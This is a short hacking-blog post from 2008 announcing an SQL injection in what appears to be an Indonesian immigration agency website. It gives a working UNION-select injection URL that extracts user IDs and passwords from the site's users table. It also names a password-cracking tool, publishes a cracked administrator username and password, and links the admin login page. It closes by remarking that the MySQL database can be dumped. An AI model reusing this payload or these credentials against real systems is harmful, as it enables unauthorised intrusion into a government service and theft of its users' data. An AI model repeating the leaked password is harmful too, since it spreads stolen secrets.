viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, November 21, 2008

[SQLi] http://www.imigrasi.co.id

5:25 PM Posted by viperfx07 No comments
PoC: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=[SQli]
Demo: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=1+and+1=2+union+select+1,2,concat_ws(0x3a,usrID,usrPwd),4,5,6,7,8+from+users+limit+0,1--

Tools: RainbowCrack at irc.plain-text.info
Admin usr/pwd: admin:123qweasdzxc
Admin login page: http://www.imigrasi.co.id/login.php
Comment: mysql db can also be dumped.

Screenshot:



0 comments:

Post a Comment